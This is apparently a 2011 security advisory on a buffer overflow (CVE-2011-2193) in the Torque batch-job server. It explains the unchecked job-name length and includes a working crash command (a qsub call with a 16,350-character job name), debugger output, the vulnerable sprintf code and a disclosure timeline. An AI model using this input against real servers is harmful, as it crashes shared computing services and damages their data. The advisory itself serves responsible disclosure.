Torque Server Buffer Overflow Vulnerability


Name:   Torque Server Buffer Overflow Vulnerability
Author: Adam Zabrocki (<pi3@itsec.pl>)
        Bartlomiej Balcerek (<bartol@pwr.wroc.pl>)
        Maciej Kotowicz (<maciej.kotowicz@pwr.wroc.pl>)
Date:   March 27, 2011
Risk:   Moderate
CVE:    CVE-2011-2193

Description:

TORQUE Resource Manager provides control over batch jobs and distributed computing resources. It is an advanced open-source product based on the original PBS project and incorporates the best of both community and professional development. It incorporates significant advances in the areas of scalability, reliability, and functionality and is currently in use at tens of thousands of leading government, academic, and commercial sites throughout the world. TORQUE may be freely used, modified, and distributed under the constraints of the included license. TORQUE is used in most GRID projects, including WLCG and EGEE.

Details:

A buffer overflow vulnerability has been found in the Torque server. It was reported to the EGI SVG (RT 1870) as well as to the Torque software providers. The Torque providers have fixed it, and an updated version is also available in EPEL.

The Torque server does not check the length of the "job name" argument before using it; the string is validated only on the client side. A modified Torque client or the DRMAA interface can therefore submit a job whose name is arbitrary in both length and content. This allows an attacker to overflow a buffer and overwrite internal data of the Torque server process, altering its behavior.
The overflow can overwrite the global log_buffer string array and every symbol that follows it:

    0000000000734b00 B log_buffer
    0000000000738b00 B msg_registerrel
    0000000000738b08 B msg_manager
    0000000000738b10 B msg_startup1
    0000000000738b18 B msg_momnoexec1
    0000000000738b20 B msg_man_uns
    0000000000738b28 B msg_sched_nocall
    0000000000738b30 B msg_issuebad
    0000000000738b38 B stdout@@GLIBC_2.2.5
    0000000000738b40 B msg_job_end_stat
    0000000000738b48 b dtor_idx.6147
    0000000000738b50 b completed.6145
    0000000000738b58 b acct_opened
    0000000000738b5c b acct_auto_switch
    0000000000738b60 b acctfile
    0000000000738b68 b acct_opened_day
    0000000000738b70 b spaceused
    0000000000738b78 b spaceavail
    0000000000738b80 b username.6360
    0000000000738bc0 b groupname.6402

Here is an example of how to submit the crafted job:

    [bartol@bartek_torque torque-mod]$ echo /bin/date | ./src/cmds/qsub -Z "Job_Name=`perl -e 'print "A"x16350'`"

A debugger then shows that the structures adjacent to log_buffer have been overwritten with "A" characters (0x41 bytes):

    Program received signal SIGINT, Interrupt.
    0x00000033550cd323 in __select_nocancel () from /lib64/libc.so.6
    (gdb) x/20x 0x0000000000738b00
    0x738b00 <msg_registerrel>:     0x4141414141414141      0x4141414141414141
    0x738b10 <msg_startup1>:        0x4141414141414141      0x4141414141414141
    0x738b20 <msg_man_uns>:         0x4141414141414141      0x4141414141414141

The overflow occurs in the following code:

    sprintf(log_buffer, msg_jobnew,
            preq->rq_user, preq->rq_host,
            pj->ji_wattr[(int)JOB_ATR_job_owner].at_val.at_str,
            pj->ji_wattr[(int)JOB_ATR_jobname].at_val.at_str,
            pj->ji_qhdr->qu_qs.qu_name);

We proved that a server crash is easily possible (including database damage), and we think privilege escalation can also be achieved with some more effort, although the latter depends strongly on the particular build flags and architecture.
The overflow is also possible in the pbs_iff setuid binary, since the length of the "host" variable is not checked:

    sprintf(log_buffer,"cannot resolve IP address for host '%s' herror=%d: %s",
            hostname, /*1*/
            h_errno,
            hstrerror(h_errno));

Affected Software:

Versions of Torque prior to Torque 2.4.14, and also Torque 3.0.0 and 3.0.1.

References:

CVE assignment:      http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2193
RH bug:              https://bugzilla.redhat.com/show_bug.cgi?id=711463
RH release for SL5:  https://admin.fedoraproject.org/updates/torque-2.3.13-2.el5
Cluster Resources:   http://www.clusterresources.com/pipermail/torqueusers/2011-June/012982.html

Timeline (yyyy-mm-dd):

2011-05-10  Vulnerability reported to the EGI SVG by Bartlomiej Balcerek, in addition to reporting to the software providers
2011-05-10  Acknowledgement from the EGI SVG to the reporter
2011-06-06  Software provider states the issue is fixed
2011-06-07  Bug submitted in RH EPEL, as EGI mostly uses the EPEL distribution
2011-06-22  Updated packages formally released in EPEL
2011-06-24  Public disclosure by the EGI SVG

--
http://pi3.com.pl